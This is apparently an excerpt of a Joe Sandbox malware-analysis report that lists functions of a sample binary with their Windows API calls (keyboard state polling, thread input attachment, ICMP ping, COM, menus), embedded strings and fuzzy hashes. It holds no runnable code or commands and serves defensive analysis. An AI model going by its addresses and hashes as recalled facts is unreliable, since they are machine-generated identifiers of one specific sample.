Instruction Fuzzy Hash: E4C10975A04209AFDB14DFA4C884DAEBBF9FF48314B148499F81A9B361D730EE45CB90

Function 0099541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00995504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00995515
CharNextW.USER32(00000158), ref: 00995544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00995585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0099559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009955AC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: bde60dc8db50386235e16127f3a88ced87784678f7501ae96e317d5d09595987
Instruction ID: 21485a8dd270925c9d2b1ab55aae4b9be29b59c61b9237bef0bf5904c4bdca5a
Opcode Fuzzy Hash: bde60dc8db50386235e16127f3a88ced87784678f7501ae96e317d5d09595987
Instruction Fuzzy Hash: CE61CE71904609EFEF128F98CC84AFF7BB9EB09721F114445F925AB2A1D7349A80DB61

Function 0095FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0095FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0095FB08
VariantInit.OLEAUT32(?), ref: 0095FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0095FB3A
VariantCopy.OLEAUT32(?,?), ref: 0095FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0095FBA1
VariantClear.OLEAUT32(?), ref: 0095FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0095FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0095FBCC
VariantClear.OLEAUT32(?), ref: 0095FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0095FBE9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 09de5df7633ef083e21cdadde5143795847a6a923b4176d1f0d6cb978480a36e
Instruction ID: d1d52f0ebe1902006e3fbb5317721f0ee394c3e82a378701bd0bd9a8bcf259fe
Opcode Fuzzy Hash: 09de5df7633ef083e21cdadde5143795847a6a923b4176d1f0d6cb978480a36e
Instruction Fuzzy Hash: 6E418175A04219EFCF00DF69CC649AEBBB9FF48355F008069F905A7261DB30A945CFA1

Function 00969C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00969CA1
GetAsyncKeyState.USER32(000000A0), ref: 00969D22
GetKeyState.USER32(000000A0), ref: 00969D3D
GetAsyncKeyState.USER32(000000A1), ref: 00969D57
GetKeyState.USER32(000000A1), ref: 00969D6C
GetAsyncKeyState.USER32(00000011), ref: 00969D84
GetKeyState.USER32(00000011), ref: 00969D96
GetAsyncKeyState.USER32(00000012), ref: 00969DAE
GetKeyState.USER32(00000012), ref: 00969DC0
GetAsyncKeyState.USER32(0000005B), ref: 00969DD8
GetKeyState.USER32(0000005B), ref: 00969DEA

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 718e515ccb71a340dca99428f98cfa554ce7715fdbc38d73b70ad3dab4772d82
Instruction ID: 44e0a6eac880206df23c9d07f2a80bc2a13678a47cf0ddf992a9c3d7e7716579
Opcode Fuzzy Hash: 718e515ccb71a340dca99428f98cfa554ce7715fdbc38d73b70ad3dab4772d82
Instruction Fuzzy Hash: EE410B745087CA6DFF318764C8143B5BEEC6F11344F04806BEAC65A6C2DBB599C8C7A2

Function 0098055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009805BC
inet_addr.WSOCK32(?), ref: 0098061C
gethostbyname.WSOCK32(?), ref: 00980628
IcmpCreateFile.IPHLPAPI ref: 00980636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009806C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009806E5
IcmpCloseHandle.IPHLPAPI(?), ref: 009807B9
WSACleanup.WSOCK32 ref: 009807BF

Strings

Ping, xrefs: 00980676

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 112f574892b3bc2dbe60037cabae90d19628785850c89cfec59c145f80f56943
Instruction ID: 385489d276ec8613d9ff35a1a9bcee7ad4fedbd0fa5cd24c5792187fae00ad4a
Opcode Fuzzy Hash: 112f574892b3bc2dbe60037cabae90d19628785850c89cfec59c145f80f56943
Instruction Fuzzy Hash: 8291A0756082419FD360EF15C889F1ABBE4AF84318F1485A9F4698B7A2C734FD49CF91

Function 00988CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00988CF3

Part of subcall function 00968E54: _wcslen.LIBCMT ref: 00968E77

_wcslen.LIBCMT ref: 00988D4E
_wcslen.LIBCMT ref: 00988D9C
_wcslen.LIBCMT ref: 00988DDC
_wcslen.LIBCMT ref: 00988E6E

Strings

stdcall, xrefs: 00988DD6, 00988DDB
winapi, xrefs: 00988D96, 00988D9B
cdecl, xrefs: 00988D48, 00988D4D
none, xrefs: 00988E65, 00988E6A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: d165e2806dc003d087da093613d3a4328aaa4f45e36215de060cfed807f4a8db
Instruction ID: e68a603fd9587064f765b0d39d53ea544cd80cacc2db9109321f8b1797904477
Opcode Fuzzy Hash: d165e2806dc003d087da093613d3a4328aaa4f45e36215de060cfed807f4a8db
Instruction Fuzzy Hash: F4519331A041169BCB24FF6CC9409BFB7A9BF64764BA04629E826E73C5DB35DD40C7A0

Function 0098372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00983774
CoUninitialize.OLE32 ref: 0098377F
CoCreateInstance.OLE32(?,00000000,00000017,0099FB78,?), ref: 009837D9
IIDFromString.OLE32(?,?), ref: 0098384C
VariantInit.OLEAUT32(?), ref: 009838E4
VariantClear.OLEAUT32(?), ref: 00983936

Strings

Invalid parameter, xrefs: 00983865
NULL Pointer assignment, xrefs: 0098381E
Failed to create object, xrefs: 009837E4, 0098389A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: c0a31d0771597cc822116dca91b61c53aeb3f084a8ad09d22337254883d9a75b
Instruction ID: 8c6650596b78cfd7534cfc0da230180945adbd6979013f619547fac00e189b34
Opcode Fuzzy Hash: c0a31d0771597cc822116dca91b61c53aeb3f084a8ad09d22337254883d9a75b
Instruction Fuzzy Hash: A3618E71608301AFD710EF54C889F5AB7E8AF88B14F10880DF99597391D774EE48CB92

Function 00973388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009733CF

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009733F0

Strings

Line %d (File "%s"):, xrefs: 00973443, 0097345C
Incorrect parameters to object property !, xrefs: 009734AB
"%s" (%d) : ==> %s:%s%s, xrefs: 00973504
"%s" (%d) : ==> %s:, xrefs: 00973522
^ ERROR , xrefs: 0097349E
Error: , xrefs: 009734D1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 1a515de1053c1c365259d987ecb4a8edaa5abbfeb5791a5fbfc4d14ecb23db09
Instruction ID: e486f2ae02d87ecf73476a51e259e4af894c3beee93698138cf8f5ac77109051
Opcode Fuzzy Hash: 1a515de1053c1c365259d987ecb4a8edaa5abbfeb5791a5fbfc4d14ecb23db09
Instruction Fuzzy Hash: 28518072D04209AEDF14EBA0CD42FEEB779AF44344F108065F509720A2EB312F58DB61

Function 0096B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0096B5FC
_wcslen.LIBCMT ref: 0096B608
_wcslen.LIBCMT ref: 0096B64D
_wcslen.LIBCMT ref: 0096B68C
_wcslen.LIBCMT ref: 0096B6C7

Strings

EXISTS, xrefs: 0096B686, 0096B68B
APPEND, xrefs: 0096B6C1, 0096B6C6
KEYS, xrefs: 0096B647, 0096B64C
REMOVE, xrefs: 0096B602, 0096B607

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 466357435fcbbaa992047890715fbd4457b246cbdb58c1f0a3a6d330edf83323
Instruction ID: c029cd443b41dcfe0e3c0eecd9296ad383093a10706cd8a1024cdcae8dfea4d6
Opcode Fuzzy Hash: 466357435fcbbaa992047890715fbd4457b246cbdb58c1f0a3a6d330edf83323
Instruction Fuzzy Hash: E441C632A011279BCB205F7DC9906BE77A9AFA0BB8B254529E521DB284F735CDC1C790

Function 00975393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009753A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00975416
GetLastError.KERNEL32 ref: 00975420
SetErrorMode.KERNEL32(00000000,READY), ref: 009754A7

Strings

READONLY, xrefs: 00975452
UNKNOWN, xrefs: 00975444
NOTREADY, xrefs: 0097544B
INVALID, xrefs: 00975459
READY, xrefs: 00975460, 00975468

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 38e6479977e68ba4cf75ab703f70ef7d533c129caaa0e81d9587382aee8bc905
Instruction ID: a1a29352e4ba05713764eb524006eeee78553a6f530477c5d32f360e13a0fd2a
Opcode Fuzzy Hash: 38e6479977e68ba4cf75ab703f70ef7d533c129caaa0e81d9587382aee8bc905
Instruction Fuzzy Hash: 2631B376A00604DFD750DF68C884FAA7BB8EF45305F15C059E40ACB2A2DBB1DD82CB91

Function 00993C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00993C79
SetMenu.USER32(?,00000000), ref: 00993C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00993D10
IsMenu.USER32(?), ref: 00993D24
CreatePopupMenu.USER32 ref: 00993D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00993D5B
DrawMenuBar.USER32 ref: 00993D63

Strings

0, xrefs: 00993C54
F, xrefs: 00993D4E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 462db29b14db985f7a110800eb83337e0ec00736eb1a39e70e57dc46a070eff6
Instruction ID: db4ff9640f2fc50a3da19ab72beee2ee23472d24d954cb27a58da75453bc258b
Opcode Fuzzy Hash: 462db29b14db985f7a110800eb83337e0ec00736eb1a39e70e57dc46a070eff6
Instruction Fuzzy Hash: E2417CB5A15209EFDF14CFA8D854AAA7BB9FF49350F144029F946973A0D730AA10DF90

Function 00993A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00993A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00993AA0
GetWindowLongW.USER32(?,000000F0), ref: 00993AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00993AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00993B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00993BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00993BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00993BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00993BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00993C13

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b3e3458c8dffeb840f8179e10f758a049d4d7d4007192d56eaab14478c148afe
Instruction ID: a839ecaa1e59340bd3d0b0ebb4cd22713b318c73f615c1373e48c5d60c7877fd
Opcode Fuzzy Hash: b3e3458c8dffeb840f8179e10f758a049d4d7d4007192d56eaab14478c148afe
Instruction Fuzzy Hash: 9B616B75900248AFDF10DFA8CC81EEE77F8EB49704F10419AFA15A72A2D774AE85DB50

Function 0096B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0096B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B165
GetWindowThreadProcessId.USER32(00000000), ref: 0096B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0096B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0096A1E1,?,00000001), ref: 0096B21D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 8d7d70338662e01283661afb5ddfc9decf4898ea174960cb7a68af74e3d9f83b
Instruction ID: bcc96acd51b1b003cfedfc6031b490cdbce32468c3b87ab3224d76c9f27a7da6
Opcode Fuzzy Hash: 8d7d70338662e01283661afb5ddfc9decf4898ea174960cb7a68af74e3d9f83b
Instruction Fuzzy Hash: C931ADB1568204BFDF209F68DD98B6E7BADBB61312F108016FA11D6190E7B49EC09F61

Function 00932C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00932C94

Part of subcall function 009329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000), ref: 009329DE
Part of subcall function 009329C8: GetLastError.KERNEL32(00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000,00000000), ref: 009329F0

_free.LIBCMT ref: 00932CA0
_free.LIBCMT ref: 00932CAB
_free.LIBCMT ref: 00932CB6
_free.LIBCMT ref: 00932CC1
_free.LIBCMT ref: 00932CCC
_free.LIBCMT ref: 00932CD7
_free.LIBCMT ref: 00932CE2
_free.LIBCMT ref: 00932CED
_free.LIBCMT ref: 00932CFB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3e0cf64483ac6c0a9dfe3e8f8bbc22ebce8dda9fcdfb021e3bf80792fa441f1b
Instruction ID: 47ded6545d8f99224e1fb28c1b1c7056201bb7ff3323a036e5b80c591d04fb4e
Opcode Fuzzy Hash: 3e0cf64483ac6c0a9dfe3e8f8bbc22ebce8dda9fcdfb021e3bf80792fa441f1b
Instruction Fuzzy Hash: E411A47A100118AFCB02EF54EA82EDD7BA9FF45350F4144A5FA489F222DA31EE509F90

Function 00901410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00901459
OleUninitialize.OLE32(?,00000000), ref: 009014F8
UnregisterHotKey.USER32(?), ref: 009016DD
DestroyWindow.USER32(?), ref: 009424B9
FreeLibrary.KERNEL32(?), ref: 0094251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0094254B

Strings

close all, xrefs: 00901454

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 3df5f6c130139a28a4369775c685d1c306b54700da24e009cb8c324307750166
Instruction ID: 30efd892eec9d0e14ffa703da19db01fb3f7f0d267d35c8811c880b8c2d24f02
Opcode Fuzzy Hash: 3df5f6c130139a28a4369775c685d1c306b54700da24e009cb8c324307750166
Instruction Fuzzy Hash: 0AD16C717012128FCB29EF15C899F29F7A4BF45700F5581ADF84A6B2A2DB31AD52CF50

Function 00977DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00977FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00977FC1
GetFileAttributesW.KERNEL32(?), ref: 00977FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00978005
SetCurrentDirectoryW.KERNEL32(?), ref: 00978017
SetCurrentDirectoryW.KERNEL32(?), ref: 00978060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009780B0

Strings

*.*, xrefs: 00978066

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: c2d5e947d603227b009660bb69ff86af52ea0e69e37c1c000e99af7174a8bb83
Instruction ID: 37ad9791ddb337157599e783e29d390ac43467f3f07814d535e46151bc312a26
Opcode Fuzzy Hash: c2d5e947d603227b009660bb69ff86af52ea0e69e37c1c000e99af7174a8bb83
Instruction Fuzzy Hash: C7819F725082019FDB20EF54C844AAEF3E8BF89714F148C6EF889D7260EB75DD458B92

Function 00905BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00905C7A

Part of subcall function 00905D0A: GetClientRect.USER32(?,?), ref: 00905D30
